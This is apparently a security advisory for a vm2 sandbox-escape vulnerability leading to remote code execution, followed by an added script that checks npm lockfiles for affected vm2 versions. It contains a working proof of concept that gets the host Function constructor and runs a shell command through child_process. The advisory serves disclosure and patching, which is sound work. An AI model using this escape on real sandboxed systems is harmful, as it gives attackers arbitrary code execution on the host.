
vm2 has a Sandbox Escape issue

CVE-2026-47131 | RCE | 2026-05-29

Vulnerability Description

### Summary

By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code.

### PoC

```js
"use strict";

const { VM } = require("vm2");
const vm = new VM();

vm.run(`
"use strict";

const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");

async function f() {
  try {
    await WebAssembly.compileStreaming();
  } catch(e) {
    setProto.call(getProto.call(e), null);
  }
  try {
    await WebAssembly.compileStreaming();
  } catch(e) {
    const HostFunction = e.constructor.constructor;
    new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
  }
}
f();
`);
```

### Impact

Sandbox Escape → RCE

Source Code Location: https://github.com/patriksimek/vm2

Affected Packages:
- npm:vm2, affected <= 3.11.3, patched in 3.11.4

CWEs:
- CWE-913: Improper Control of Dynamically-Managed Code Resources

CVSS:
- Primary: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- CVSS_V3: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References:
- https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg
- https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8
- https://github.com/patriksimek/vm2/releases/tag/v3.11.4
- https://github.com/advisories/GHSA-v6mx-mf47-r5wg
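The affected range given in this advisory (npm:vm2 <= 3.11.3, patched in 3.11.4) can be checked against a project's npm lockfile, including copies of vm2 pulled in transitively. The following is an added example, not code from the advisory or the vm2 project; the sample lockfile and the package names `demo-app`, `some-runner` and `vm2-helper` are constructed, and only the v2/v3 `packages` map is handled.

```javascript
// Added example: flag vm2 installs inside the advisory's affected range.
// The fixed version (3.11.4) comes from the advisory text.
const FIXED = "3.11.4";

// Parse "x.y.z" with an optional "-prerelease" suffix.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?/.exec(v);
  if (!m) return null;
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre: Boolean(m[4]) };
}

// True when the version sorts below FIXED, i.e. is "<= 3.11.3".
function isAffected(version) {
  const a = parseVersion(version);
  const b = parseVersion(FIXED);
  if (!a) return true; // unparseable version: fail closed and report it
  for (let i = 0; i < 3; i++) {
    if (a.nums[i] !== b.nums[i]) return a.nums[i] < b.nums[i];
  }
  // Assumption: a prerelease of the fixed version is treated as unpatched.
  return a.pre;
}

// Walk the lockfile "packages" map and report every affected vm2 copy,
// including ones nested under other dependencies.
function findAffectedVm2(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!/(^|\/)node_modules\/vm2$/.test(path)) continue;
    if (isAffected(String(meta.version))) hits.push({ path, version: meta.version });
  }
  return hits;
}

// Constructed sample lockfile, not taken from a real project.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/vm2": { version: "3.11.4" },
    "node_modules/some-runner/node_modules/vm2": { version: "3.11.3" },
    "node_modules/vm2-helper": { version: "1.0.0" },
  },
};

console.log(findAffectedVm2(sampleLock));
```

To run it against a real project, pass the parsed contents of `package-lock.json` to `findAffectedVm2` in place of `sampleLock`.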
